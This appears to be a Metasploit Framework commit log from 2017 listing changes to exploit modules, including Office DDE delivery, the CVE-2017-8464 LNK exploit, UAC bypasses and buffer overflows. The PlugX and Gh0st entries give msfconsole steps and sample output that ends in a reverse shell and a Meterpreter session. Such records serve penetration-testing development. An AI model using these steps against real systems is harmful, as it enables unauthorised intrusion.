7bdc99a153
Fix HANDLER + some default options!
2017-12-07 13:53:39 -05:00
09aa433fdc
Add MESSAGE field for "obfuscation"
2017-12-07 08:04:31 -05:00
8bb6a8f47c
Rename office_dde_delivery to office_dde_delivery.rb
2017-12-06 22:40:37 -05:00
9d11c60d88
Office DDE Payload Delivery
...
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
adba277be0
axe errant spaces at EOL
2017-12-04 16:57:48 -08:00
69b01d26bb
Land #9226 , Microsoft Office OLE object memory corruption
2017-12-04 16:50:27 -08:00
b96dac28d5
fix info segment
2017-12-04 16:42:41 -05:00
4cbb5f2619
added new target
2017-12-01 18:35:45 -06:00
c79186593a
Update DiskBoss Module (EDB 42395)
...
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
c788e4e540
Update office_ms17_11882.rb
2017-12-01 11:36:03 -05:00
7df46b33e8
disassembly ASM
2017-12-01 08:03:56 -05:00
2544b4d8db
Change target name
2017-11-28 21:39:04 -05:00
cb7f173811
Update office_ms17_11882.rb
2017-11-28 21:36:25 -05:00
0d79a3a3e2
Add support to Windows .NET Server
2017-11-23 08:35:55 -02:00
960893b99d
change default payload
2017-11-22 06:36:46 -05:00
275f70e77e
better saving
2017-11-21 19:34:04 -05:00
db4c0fcca9
spelling
2017-11-21 19:02:14 -05:00
fcea6fd8d4
actually create new file ;-;
2017-11-21 15:00:06 -05:00
39a4d193a1
Create office_ms17_11882.rb
2017-11-21 14:47:02 -05:00
df2b62dc27
Add Mako Server CMD injection Linux support, update docs, move to multi
2017-11-10 16:28:39 -05:00
ea260e87b7
Remove headers, since we didn't send them before
...
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
7213e6cc49
Fix #9133 , makoserver_cmd_exec cleanup
2017-11-09 10:52:03 -06:00
52888871e3
Land #8747 RCE for Geutebrueck GCore on Windows
2017-11-08 20:22:54 -05:00
7ad151e68b
gcore formatting update
2017-11-08 20:21:40 -05:00
39916ef61a
Land #9133 , Command injection in Mako Server examples
2017-11-08 15:11:01 -06:00
d95b333ae9
Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549.
2017-11-09 03:59:18 +11:00
b7c604f941
Land #9189 , s/patrick/aushack/g
2017-11-08 10:27:03 -06:00
5a07be9b96
Land #9041 , Add LPE on Windows using CVE-2017-8464
2017-11-08 10:09:03 -06:00
2f6da89674
Change author name to nick.
2017-11-09 03:00:24 +11:00
6683ba501f
added one missing change
2017-11-07 20:05:43 +01:00
8963d77bca
multiple changes as requested by h00die
2017-11-07 20:00:56 +01:00
7d1de9bc48
Fix removing the dropped files after exploitation
2017-11-04 18:50:20 -04:00
697031eb36
mysql UDF now multi
2017-11-03 05:26:05 -04:00
70033e2b94
Enable the payload handler by default
2017-11-02 12:31:54 -04:00
b96fa690a9
Add brackets to print functions
2017-10-27 15:23:22 -04:00
8613852ee8
Add Mako Server v2.5 command injection module/docs
2017-10-26 23:29:11 -04:00
f2cba8d920
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
...
This restores the original PR
2017-10-25 16:29:11 -05:00
ca28abf2a2
Revert "Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
...
This reverts commit 4999606b614274b76473
2017-10-25 16:19:14 -05:00
4999606b61
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
2017-10-25 12:44:04 -05:00
df14dc4452
autodetection fixing
2017-10-23 09:07:46 +02:00
7cd532c384
Change targetr to target to fix small typo bug on one failure
...
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.
So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
c67a5872cd
Land #9055 , Add exploit for Sync Breeze HTTP Server
...
Land #9055
2017-10-13 17:34:03 -05:00
3a2c6128be
Support automatic targeting
2017-10-13 16:53:22 -05:00
294230c455
Land #8509 , add Winsxs bypass for UAC
2017-10-11 16:24:52 -05:00
a4bc3ea3c2
Merge branch 'pr9032' into upstream-master
...
Land #9032 , Improve CVE-2017-8464 LNK exploit
Land #9032
2017-10-10 17:11:51 -05:00
c14c93d450
Integrate OfficeScan 11 exploitation and fix grammer issues
2017-10-09 22:11:42 +03:00
ef282ea154
Sync Breeze HTTP Server v10.0.28 BOF
...
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
fc5ab96ad6
Merging to prep for testing
...
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
79c9123261
Adding Trend Micro OfficeScan widget rce module
2017-10-08 17:54:18 +03:00
b7184e87c0
fixing a type
2017-10-07 14:16:01 +02:00
8d50c34e4b
codefixing
2017-10-07 14:06:58 +02:00
d9e0d891a1
Land #9010 , Remove checks for hardcoded SYSTEM account name
2017-10-06 13:42:18 -05:00
770547269b
added documentation, and fixed 4 to 2 indentation
2017-10-06 15:39:25 +02:00
9d2e8b1e4d
Land #8003 , Evasions for delivering nops/shellcode into memory
2017-10-05 16:44:36 -05:00
e4d99a14b6
Fix EXITFUNC back to process for the RCE too
2017-10-05 11:38:08 -04:00
4729c885f1
Cleanup the CVE-2017-8464 LPE module
2017-10-05 11:10:37 -04:00
d0ebfa1950
Change the template technicque to work as an LPE
2017-10-05 10:30:28 -04:00
825ad940e6
Update the advanced option names and a typo
2017-10-05 10:16:31 -04:00
482ce005fd
Update the advanced option names and a typo
2017-10-05 10:11:00 -04:00
10dafdcb12
Fix #9036 , broken refs in bypassuac_comhijack
...
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
9ff6efd3a3
Remove broken link
2017-10-02 20:43:55 +05:30
f2f48cbc8f
Update the CVE-2017-8464 module
2017-09-30 18:25:16 -04:00
41e3895424
remove checks for hardcoded name
2017-09-27 07:41:06 +02:00
e8eeb784e4
Land #8960 , spelling/grammar fixes part 3
2017-09-22 18:51:31 -05:00
8de6fa79c1
Tweakz, yo.
2017-09-22 18:49:09 -05:00
c90f885938
Finished spelling issues
2017-09-17 16:00:04 -04:00
d5362333e2
Land #8958 , Add Disk Pulse Enterprise web server buffer overflow
2017-09-15 13:34:22 -05:00
30f833f684
80 pages left
2017-09-13 22:03:34 -04:00
52385f4d9e
fix formatting to fit rubocop
2017-09-13 11:46:57 -05:00
b8c40a9d95
Clean up formatting
2017-09-13 11:13:33 -05:00
3c204f91ef
Correct module title
2017-09-13 11:02:13 -05:00
65f2ee9109
added generate_seh_record
2017-09-13 10:56:32 -05:00
7db506887b
Add exploit code
2017-09-13 10:36:36 -05:00
eb0d174987
Add disk_pulse_enterprise_get module
2017-09-13 10:19:24 -05:00
7b87915e1f
Land #8923 , Add additional error checking to mssql_clr_payload module
2017-09-11 17:39:33 -05:00
5f66b7eb1a
Land #8940 , @h00die's second round of desc fixes
...
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
cfbd3c1615
Fix spelling of Honeywell
2017-09-11 13:02:18 -05:00
ba880d1a85
Changes to mssql_clr_payload error handling based on code review
2017-09-10 14:15:39 -05:00
7339658ba9
224 pages of spelling issues left
2017-09-09 09:52:08 -04:00
0910c482a9
35 pages of spelling done
2017-09-08 22:19:55 -04:00
b884705a93
regsvr32_applocker_bypass_server -> web_delivery
2017-09-06 12:35:52 +01:00
be66ed8af3
Land #8788 exploits for Gh0st and PlugX malware controllers
2017-09-05 20:42:07 -04:00
44fb059cea
Add error checking to mssql_clr_payload
...
Additional error checking had been added to exploits/windows/mssql/mssql_clr_payload
If an error is encountered when changing the trustworthy or clr setting, the exploit fails with a message.
2017-09-05 18:48:22 -05:00
d05c401866
modules cleanup and add docs
2017-09-04 20:57:23 -04:00
367c760927
window move is now directly in the template
2017-08-20 17:48:59 -05:00
e734a7923a
Land #8267 , Handle multiple entries in PSModulePath
2017-08-20 17:44:30 -05:00
2eba188166
Land #8789 , Add COM class ID hijack method for bypassing UAC
2017-08-20 13:57:17 -05:00
26193216d1
Land #8686 , add 'download' and simplified URI request methods to http client mixin
...
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
7d4561e0fd
rename to download_log to avoid conflicting with the mixin
2017-08-14 01:10:37 -04:00
da3ca9eb90
update some documentation
2017-08-03 17:09:44 -05:00
ddd841c0a8
code style cleanup + add automatic targeting based on payload
2017-08-03 00:27:54 -05:00
b62429f6fa
handle drive letters specified like E: nicely
2017-08-03 00:27:22 -05:00
46ec04dd15
Removed This PC ItemID & increased timeout in WaitForSingleObject
...
Remove the This PC ItemID to bypass (some) AV.
Timeout for WaitForSingleObject is set to 2,5s. After this timeout a
mutex is released allowed a new payload to be executed.
2017-08-02 15:47:22 -05:00
e51e1d9638
Added new DLL templates to prevent crashing of Explorer
2017-08-02 15:47:21 -05:00
3229320ba9
Code review feedback from @nixawk
2017-08-02 15:46:51 -05:00
565a3355be
CVE-2017-8464 LNK Remote Code Execution Vulnerability
...
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The
created LNK file is similar except in an additional
SpecialFolderDataBlock is included. The folder ID set in this
SpecialFolderDataBlock is set to the Control Panel. This is enought to
bypass the CPL whitelist. This bypass can be used to trick Windows into
loading an arbitrary DLL file.
2017-08-02 15:46:30 -05:00
54ded4300e
Land #8791 - Update Accuvant refs to point to Optiv
2017-08-02 13:26:52 +10:00
8989d6dff2
Modified Accuvant bog posts to the new Optive urls
2017-08-02 13:25:17 +10:00
bb2304a2d1
Land #8769 , improve style, compatibility, for ssh modules
2017-08-01 21:43:32 -05:00
1d75a30936
update style for other ssh exploits
2017-08-01 16:05:25 -05:00
8c9fb1d529
remove unneeded netssh checks in modules
2017-08-01 14:46:10 -05:00
e61cccda0b
Land #8779 , Adding error handler for ms17-010 exploit where SMBv1 is disabled
2017-08-01 14:00:12 -05:00
6ee5d83a15
Add the COM hijack method for bypassing UAC
2017-07-31 14:26:39 +10:00
055d64d32b
Fixed to modules as suggested from upstream
...
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
2017-07-30 10:14:05 -06:00
99546330f1
Added PlugX Controller Stack Overflow Module
...
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.
- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target
Sample output:
```
msf> use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check
[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
2017-07-29 10:36:42 -06:00
c336daec8d
Added Gh0st Controller Buffer Overflow Module
...
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution
## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.
- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit
Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit
[*] Started reverse TCP handler on 192.168.161.1:4444
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
2017-07-29 10:21:05 -06:00
b2ecaa489d
Rescue only RubySMB::Error::CommunicationError
2017-07-27 19:19:45 +10:00
f2091928ec
Adding no SMBv1 error handler for ms17-010 exploit
2017-07-27 16:21:09 +10:00
bf4dce19fb
I added the SSD advisory
2017-07-24 14:25:10 -07:00
b099196172
deregistered SSL, added the HTA dodgy try/catch feature
2017-07-24 10:28:03 -07:00
17b28388e9
Added the advisory, opps
2017-07-24 10:09:21 -07:00
14ca2ed325
Added a icon loading trick by Brendan
2017-07-24 10:06:20 -07:00
b2a002adc0
Brendan is an evil genius\!
2017-07-24 09:58:23 -07:00
cc8dc002e9
Added CVE-2017-7442
2017-07-24 08:21:59 -07:00
6300758c46
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
80d18fae6a
update example modules to have zero violations
2017-07-24 06:15:54 -07:00
1d290d2491
resurrect one print_error/bad conversion for symmetry
2017-07-24 05:55:34 -07:00
8db3f74b81
fix a broken link
2017-07-24 05:53:09 -07:00
838b066abe
Merge branch 'master' into land-8716
2017-07-24 05:51:44 -07:00
7c55cdc1c8
fix some module documentation
...
3 modules got documentation landed in the wrong spot. This also fixes a few
typos and improves formatting.
2017-07-23 07:46:52 -07:00
e710701416
Made msftidy.rb happy
...
...untested with the set-cookie 'fix'
2017-07-21 19:55:26 -07:00
524373bb48
OCD - Removed un-needed full stop
2017-07-21 07:41:51 -07:00
772bec23a1
Fix various typos
2017-07-21 07:40:08 -07:00
c187f709dc
Update geutebrueck_gcore_x64_rce_bo.rb
...
Review changes with msftidy.
2017-07-21 11:37:12 +02:00
3f6925196b
OCD - store_loot & print_good
2017-07-19 13:02:49 +01:00
ef826b3f2c
OCD - print_good & print_error
2017-07-19 12:48:52 +01:00
0f453c602e
Even more print_status -> print_good
2017-07-19 11:46:39 +01:00
b8d80d87f1
Remove last newline after class - Make @wvu-r7 happy
2017-07-19 11:19:49 +01:00
3d4feffc62
OCD - Spaces & headings
2017-07-19 11:04:15 +01:00
a008f8e795
BruteForce - > Brute Force
2017-07-19 10:39:58 +01:00
2a1c661c79
Land #8723 , Razr Synapse local exploit
...
lands ZeroSteiner's Razr Synapse local priv esc module
2017-07-17 13:34:17 -05:00
b4813ce2c7
Update the pre-exploit check conditions
2017-07-15 14:48:54 -04:00
9775df1f6e
Land #8586 , Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit
2017-07-14 15:20:01 -05:00
ee1c87b868
Land #8172 , example modules
...
lands several example modules
2017-07-14 15:17:20 -05:00
0fde6c6b42
Land #8650 , igss9 launch path
...
land pr to fix launch path in the igss9 exploit
2017-07-14 14:39:38 -05:00
833b2a67d4
Fix the architecture check for only x64
2017-07-14 07:06:54 -04:00
4720d1a31e
OCD fixes - Spaces
2017-07-14 08:46:59 +01:00
fd843f364b
Removed extra lines
2017-07-14 08:17:16 +01:00
424522147e
OCD fixes - Start of *.rb files
2017-07-13 23:53:59 +01:00
5470670223
Change the hook for windows 10 compatibility
2017-07-13 11:49:06 -04:00
345407b0a4
Rex::Encoder::XDR conflicts with the XDR gem
2017-07-12 11:52:10 -05:00
53d5060fbd
Add the LPE for CVE-2017-9769
2017-07-10 16:57:23 -04:00
2ee6df66cf
Land #8514 , wmi persistence module
2017-07-10 09:53:55 -05:00
f4c739c190
check if running as system
2017-07-10 10:05:57 +01:00
45af651993
Fix issue generate/launch path
...
Generate file in C:\ but try to launch it in Documents and Settings\All Users\Application Data\7T\
PoC with windows/meterpreter/reverse_tcp
2017-07-04 22:14:32 +02:00
994f00622f
tidy module output
2017-06-29 16:12:23 +01:00
7e1b50ab3b
Land #8629 , AKA (also known as) module reference
2017-06-28 19:15:45 -05:00
aa8c580aba
updates
2017-06-28 20:14:38 -04:00
d20036e0fb
revise spelling, add heartbleed and tidy checks
2017-06-28 18:50:20 -04:00
Austin
William Webb
wetw0rk
Jacob Robles
vipzen
Steven Patterson
William Vu
h00die
Adam Cammack
Patrick Webster
bwatters-r7
Maurice Popp
Spencer McIntyre
Steven Patterson
Jeffrey Martin
Kent Gruber
Wei Chen
Wei Chen
Mehmet Ince
jakxx
Brent Cook
ashish gahlot
Christian Mehlmauer
Pearce Barry
loftwing
Tod Beardsley
james
g0tmi1k
Yorick Koster
OJ
TC Johnson
Professor-plum
multiplex3r
mr_me
M4P0
David Maloney
NickTyrer
syndrome5